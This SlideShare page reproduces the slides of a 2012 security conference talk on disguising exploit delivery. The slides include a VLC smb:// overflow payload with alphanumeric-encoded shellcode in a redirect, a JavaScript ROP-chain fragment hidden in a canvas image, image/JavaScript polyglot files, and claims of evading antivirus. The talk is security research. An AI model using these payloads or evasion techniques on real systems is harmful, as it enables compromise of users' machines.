SlideShare una empresa de Scribd logo

When Bad Things Come In Good Packages

Saumil Shah
Saumil Shah

My DEEPSEC 2012 talk explores the fine art of packaging when it comes to exploits. No this is not another talk about packers or crypters. We are talking STYLE! A successful exploit is one that is innovatively delivered, in style. We shall be talking about a number of sneaky, funny and innovative techniques for delivering exploits to their doorsteps without annoyances like anti-virus or content filtering getting in the way. This talk goes beyond the obvious obfuscation. We combine the power of web hacking, the power of sophisticated exploit development and goofball creativity to ensure that exploits get delivered and detonate on time, as planned. Did you know you can literally paint an exploit on canvas? Have you heard of chameleon Javascript? This and more in the talk!

Tecnología
1 de 32
when Bad Things come in Good packages Saumil Shah net-square DEEPSEC 2012
# who am i Saumil Shah, CEO Net-Square. •  Hacker, Speaker, Trainer, Author - 15 yrs in Infosec. •  M.S. Computer Science Purdue University. •  saumil@net-square.com •  LinkedIn: saumilshah •  Twitter: @therealsaumil net-square
My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference Conference "Eyes and Speaker Trainer ears open" net-square
When two forces combine... Web Binary Hacking Exploits net-square
SNEAKY LETHAL net-square
net-square
302 IMG JS HTML5 net-square
net-square
VLC smb overflow •  smb://example.com@0.0.0.0/foo/ #{AAAAAAAA....} •  Classic Stack Overflow. net-square
VLC XSPF file <?xml version="1.0" encoding="UTF-8"?>! <playlist version="1"! xmlns="http://xspf.org/ns/0/"! xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">! <title>Playlist</title>! <trackList>! <track>! <location>! smb://example.com@0.0.0.0/foo/#{AAAAAAAA....}! </location>! <extension! application="http://www.videolan.org/vlc/playlist/0">! <vlc:id>0</vlc:id>! </extension>! </track>! </trackList>! </playlist>! net-square
Alpha Encoded Tiny ZOMFG! Exploit URL net-square
100% Pure Alphanum! net-square
VLC smb overflow - HTMLized!! "<embed type="application/x-vlc-plugin"! " "width="320" height="200"! " "target="http://tinyurl.com/ycctrzf"! " "id="vlc" />! net-square
301 Redirect from tinyurl HTTP/1.1 301 Moved Permanently! X-Powered-By: PHP/5.2.12! Location: smb://example.com@0.0.0.0/foo/ #{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1! JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYII! IIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoL! KPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHk! PfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxH! kEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDn! CUCHPeEPAA}! Content-type: text/html! Content-Length: 0! Connection: close! Server: TinyURL/1.6! net-square
net-square
Exploits as Images - 1 •  Grayscale encoding (0-255). •  1 pixel = 1 character. •  Perfectly valid image. •  Decode and Execute! net-square
net-square
I'm an evil Javascript I'm an innocent image net-square
function packv(n) {var s=new Number(n).toStri ng(16);while(s.l return(unescape( ength<8)s="0"+s; "%u"+s.substring string(0,4)))}va (4,8)+"%u"+s.sub r addressof=new Array();addresso f["ropnop"]=0x6d ["xchg_eax_esp_r 81bdf0;addressof et"]=0x6d81bdef; ax_ret"]=0x6d906 addressof["pop_e 744;addressof["p d81cd57;addresso op_ecx_ret"]=0x6 f["mov_peax_ecx_ ;addressof["mov_ ret"]=0x6d979720 eax_pecx_ret"]=0 sof["mov_pecx_ea x6d8d7be0;addres x_ret"]=0x6d8eee c_eax_ret"]=0x6d 01;addressof["in 838f54;addressof ]=0x00000000;add ["add_eax_4_ret" ressof["call_pea 31;addressof["ad x_ret"]=0x6d8aec d_esp_24_ret"]=0 sof["popad_ret"] x00000000;addres =0x6d82a8a1;addr "]=0x6d802597;fu essof["call_peax nction call_ntallocatev irtualmemory(bas m){var ropnop=pac eptr,size,callnu kv(addressof["ro pop_eax_ret=pack pnop"]);var v(addressof["pop pop_ecx_ret=pack _eax_ret"]);var v(addressof["pop mov_peax_ecx_ret _ecx_ret"]);var =packv(addressof et"]);var ["mov_peax_ecx_r mov_eax_pecx_ret =packv(addressof et"]);var ["mov_eax_pecx_r mov_pecx_eax_ret =packv(addressof et"]);var ["mov_pecx_eax_r call_peax_ret=pa ckv(addressof["c var all_peax_ret"]); add_esp_24_ret=p ackv(addressof[" );var add_esp_24_ret"] popad_ret=packv( addressof["popad retval=""! _ret"]);var <CANVAS> net-square
net-square See no eval()
Same Same No Different! var a = eval(str); a = (new Function(str))(); net-square
IMAJS net-square I iz being a Javascript
IMAJS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script> net-square
IMAJS-GIF Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE no yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera ? ? 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer no - 2f 2a 00 00 Win 7 Preview yes - net-square
IMAJS-BMP Browser Support Height Width Browser/Viewer Image Javascript Renders? Executes? 2f 2a 00 00 Firefox yes yes 2f 2a 00 00 Safari yes yes 2f 2a 00 00 IE yes yes 2f 2a 00 00 Chrome yes yes 2f 2a 00 00 Opera yes yes 2f 2a 00 00 Preview.app yes - 2f 2a 00 00 XP Image Viewer yes - 2f 2a 00 00 Win 7 Preview yes - net-square
The αq Exploit net-square
Demo IMAJS αq FTW! net-square
Alpha encoded exploit code IMAJS CANVAS "loader" script net-square
These are not the sploits you're looking for net-square
No virus threat detected net-square
The FUTURE? net-square
when Bad Things come in Good packages THE END @therealsaumil saumil@net-square.com net-square

Recomendados

SAP overview.pptx
SAP overview.pptxSAP overview.pptx
SAP overview.pptx
asgharhaghi
 
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
DataWorks Summit
 
Multimedia Database
Multimedia DatabaseMultimedia Database
Multimedia Database
District Administration
 
Performance tuning and optimization (ppt)
Performance tuning and optimization (ppt)Performance tuning and optimization (ppt)
Performance tuning and optimization (ppt)
Harish Chand
 
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSINGSKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
Skillwise Group
 
Relational Database Management System
Relational Database Management SystemRelational Database Management System
Relational Database Management System
Free Open Source Software Technology Lab
 
Big Data Real Time Analytics - A Facebook Case Study
Big Data Real Time Analytics - A Facebook Case StudyBig Data Real Time Analytics - A Facebook Case Study
Big Data Real Time Analytics - A Facebook Case Study
Nati Shalom
 
Cloud or On Premise
Cloud or On PremiseCloud or On Premise
Cloud or On Premise
Chris Kernaghan
 

Recomendados

SAP overview.pptx
SAP overview.pptxSAP overview.pptx
SAP overview.pptx
asgharhaghi
 
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
Open source computer vision with TensorFlow, Apache MiniFi, Apache NiFi, Open...
DataWorks Summit
 
Multimedia Database
Multimedia DatabaseMultimedia Database
Multimedia Database
District Administration
 
Performance tuning and optimization (ppt)
Performance tuning and optimization (ppt)Performance tuning and optimization (ppt)
Performance tuning and optimization (ppt)
Harish Chand
 
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSINGSKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
SKILLWISE-SSIS DESIGN PATTERN FOR DATA WAREHOUSING
Skillwise Group
 
Relational Database Management System
Relational Database Management SystemRelational Database Management System
Relational Database Management System
Free Open Source Software Technology Lab
 
Big Data Real Time Analytics - A Facebook Case Study
Big Data Real Time Analytics - A Facebook Case StudyBig Data Real Time Analytics - A Facebook Case Study
Big Data Real Time Analytics - A Facebook Case Study
Nati Shalom
 
Cloud or On Premise
Cloud or On PremiseCloud or On Premise
Cloud or On Premise
Chris Kernaghan
 
SAP ECC to S/4HANA Move
SAP ECC to S/4HANA MoveSAP ECC to S/4HANA Move
SAP ECC to S/4HANA Move
AGSanePLDTCompany
 
SAP S4hana EWM Training
SAP S4hana EWM TrainingSAP S4hana EWM Training
SAP S4hana EWM Training
ShabaKhan11
 
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
Ashutosh Bansal
 
Capgemini CRM Modernization Services
Capgemini CRM Modernization ServicesCapgemini CRM Modernization Services
Capgemini CRM Modernization Services
Capgemini
 
SAP S4HANA : Learn From Our Implementation Journey
SAP S4HANA : Learn From Our Implementation JourneySAP S4HANA : Learn From Our Implementation Journey
SAP S4HANA : Learn From Our Implementation Journey
Anup Lakra
 
SAP Implementation Phase!!
SAP Implementation Phase!!SAP Implementation Phase!!
SAP Implementation Phase!!
Ainul Hossain Tushar
 
Real-time Data Pipelines with SAP and Apache Kafka
Real-time Data Pipelines with SAP and Apache KafkaReal-time Data Pipelines with SAP and Apache Kafka
Real-time Data Pipelines with SAP and Apache Kafka
Carole Gunst
 
Building a Big Data Pipeline
Building a Big Data PipelineBuilding a Big Data Pipeline
Building a Big Data Pipeline
Jesus Rodriguez
 
S/4HANA Migration Challenges and Use Cases Workshop
S/4HANA Migration Challenges and Use Cases WorkshopS/4HANA Migration Challenges and Use Cases Workshop
S/4HANA Migration Challenges and Use Cases Workshop
Celonis
 
Domain analysis in Software Testing
Domain analysis in Software TestingDomain analysis in Software Testing
Domain analysis in Software Testing
Lakshminarayanan Neelakandan
 
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سومآموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
faradars
 
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys MeetupsMuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
Angel Alberici
 
SAP Cloud Strategy
SAP Cloud StrategySAP Cloud Strategy
SAP Cloud Strategy
Finceptum Oy
 
IT Service Management PowerPoint Presentation Slides
IT Service Management PowerPoint Presentation Slides IT Service Management PowerPoint Presentation Slides
IT Service Management PowerPoint Presentation Slides
SlideTeam
 
SAP S/4HANA Migration Cockpit
SAP S/4HANA Migration CockpitSAP S/4HANA Migration Cockpit
SAP S/4HANA Migration Cockpit
Edwin Weijers
 
Data Warehousing with Python
Data Warehousing with PythonData Warehousing with Python
Data Warehousing with Python
Martin Loetzsch
 
Open CAESAR Initiative
Open CAESAR InitiativeOpen CAESAR Initiative
Open CAESAR Initiative
Maged Elaasar
 
Procurement Transformation with S/4 HANA Sourcing and Procurement
Procurement Transformation with S/4 HANA Sourcing and ProcurementProcurement Transformation with S/4 HANA Sourcing and Procurement
Procurement Transformation with S/4 HANA Sourcing and Procurement
SAP Ariba
 
Cics tutorial
Cics tutorialCics tutorial
Cics tutorial
HarikaReddy115
 
SAP on Azure Technical Pitch Deck
SAP on Azure Technical Pitch DeckSAP on Azure Technical Pitch Deck
SAP on Azure Technical Pitch Deck
Nicholas Vossburg
 
Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
Saumil Shah
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
Saumil Shah
 

Más contenido relacionado

La actualidad más candente

GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
Ashutosh Bansal
 
SAP Implementation Phase!!
SAP Implementation Phase!!SAP Implementation Phase!!
SAP Implementation Phase!!
Ainul Hossain Tushar
 
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سومآموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
faradars
 
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys MeetupsMuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
Angel Alberici
 
Data Warehousing with Python
Data Warehousing with PythonData Warehousing with Python
Data Warehousing with Python
Martin Loetzsch
 

La actualidad más candente (20)

SAP ECC to S/4HANA Move
SAP ECC to S/4HANA MoveSAP ECC to S/4HANA Move
SAP ECC to S/4HANA Move
 
SAP S4hana EWM Training
SAP S4hana EWM TrainingSAP S4hana EWM Training
SAP S4hana EWM Training
 
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
GitaCloud Webinar - SAP Integrated Business Planning IBP for Make To Order MT...
 
Capgemini CRM Modernization Services
Capgemini CRM Modernization ServicesCapgemini CRM Modernization Services
Capgemini CRM Modernization Services
 
SAP S4HANA : Learn From Our Implementation Journey
SAP S4HANA : Learn From Our Implementation JourneySAP S4HANA : Learn From Our Implementation Journey
SAP S4HANA : Learn From Our Implementation Journey
 
SAP Implementation Phase!!
SAP Implementation Phase!!SAP Implementation Phase!!
SAP Implementation Phase!!
 
Real-time Data Pipelines with SAP and Apache Kafka
Real-time Data Pipelines with SAP and Apache KafkaReal-time Data Pipelines with SAP and Apache Kafka
Real-time Data Pipelines with SAP and Apache Kafka
 
Building a Big Data Pipeline
Building a Big Data PipelineBuilding a Big Data Pipeline
Building a Big Data Pipeline
 
S/4HANA Migration Challenges and Use Cases Workshop
S/4HANA Migration Challenges and Use Cases WorkshopS/4HANA Migration Challenges and Use Cases Workshop
S/4HANA Migration Challenges and Use Cases Workshop
 
Domain analysis in Software Testing
Domain analysis in Software TestingDomain analysis in Software Testing
Domain analysis in Software Testing
 
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سومآموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
آموزش طراحی الگوریتم به همراه حل مثال های عملی - بخش سوم
 
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys MeetupsMuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
MuleSoft Runtime Fabric (RTF): Foundations : MuleSoft Virtual Muleys Meetups
 
SAP Cloud Strategy
SAP Cloud StrategySAP Cloud Strategy
SAP Cloud Strategy
 
IT Service Management PowerPoint Presentation Slides
IT Service Management PowerPoint Presentation Slides IT Service Management PowerPoint Presentation Slides
IT Service Management PowerPoint Presentation Slides
 
SAP S/4HANA Migration Cockpit
SAP S/4HANA Migration CockpitSAP S/4HANA Migration Cockpit
SAP S/4HANA Migration Cockpit
 
Data Warehousing with Python
Data Warehousing with PythonData Warehousing with Python
Data Warehousing with Python
 
Open CAESAR Initiative
Open CAESAR InitiativeOpen CAESAR Initiative
Open CAESAR Initiative
 
Procurement Transformation with S/4 HANA Sourcing and Procurement
Procurement Transformation with S/4 HANA Sourcing and ProcurementProcurement Transformation with S/4 HANA Sourcing and Procurement
Procurement Transformation with S/4 HANA Sourcing and Procurement
 
Cics tutorial
Cics tutorialCics tutorial
Cics tutorial
 
SAP on Azure Technical Pitch Deck
SAP on Azure Technical Pitch DeckSAP on Azure Technical Pitch Deck
SAP on Azure Technical Pitch Deck
 

Destacado

Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
Saumil Shah
 

Destacado (7)

Stegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMSStegosploit - Hacking With Pictures HITB2015AMS
Stegosploit - Hacking With Pictures HITB2015AMS
 
Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 

Similar a When Bad Things Come In Good Packages

Refactoring to Macros with Clojure
Refactoring to Macros with ClojureRefactoring to Macros with Clojure
Refactoring to Macros with Clojure
Dmitry Buzdin
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
Edward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
DataStax Academy
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!
Michael Barker
 
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
ConFoo
 
Drawing on canvas
Drawing on canvasDrawing on canvas
Drawing on canvas
suitzero
 
Crafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::ExporterCrafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::Exporter
Ricardo Signes
 

Similar a When Bad Things Come In Good Packages (20)

JavaFX
JavaFXJavaFX
JavaFX
 
Refactoring to Macros with Clojure
Refactoring to Macros with ClojureRefactoring to Macros with Clojure
Refactoring to Macros with Clojure
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to usThat Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
That Goes Without Alpha-Num (or Does It ?) all your base10 are belong to us
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
 
CoffeeScript
CoffeeScriptCoffeeScript
CoffeeScript
 
Raphaël and You
Raphaël and YouRaphaël and You
Raphaël and You
 
Array strings
Array stringsArray strings
Array strings
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programing
 
nullcon 2011 - Lessons learned from 2010
nullcon 2011 - Lessons learned from 2010nullcon 2011 - Lessons learned from 2010
nullcon 2011 - Lessons learned from 2010
 
PHP and MySQL
PHP and MySQLPHP and MySQL
PHP and MySQL
 
Locks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael BarkerLocks? We Don't Need No Stinkin' Locks - Michael Barker
Locks? We Don't Need No Stinkin' Locks - Michael Barker
 
Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!Lock? We don't need no stinkin' locks!
Lock? We don't need no stinkin' locks!
 
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+Marrow: A Meta-Framework for Python 2.6+ and 3.1+
Marrow: A Meta-Framework for Python 2.6+ and 3.1+
 
DEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsychDEF CON 23 - CHRIS DOMAS - REpsych
DEF CON 23 - CHRIS DOMAS - REpsych
 
Drawing on canvas
Drawing on canvasDrawing on canvas
Drawing on canvas
 
React Native - Workshop
React Native - WorkshopReact Native - Workshop
React Native - Workshop
 
Crafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::ExporterCrafting Custom Interfaces with Sub::Exporter
Crafting Custom Interfaces with Sub::Exporter
 

Más de Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 

Más de Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Último

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
Principled Technologies
 

Último (20)

EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
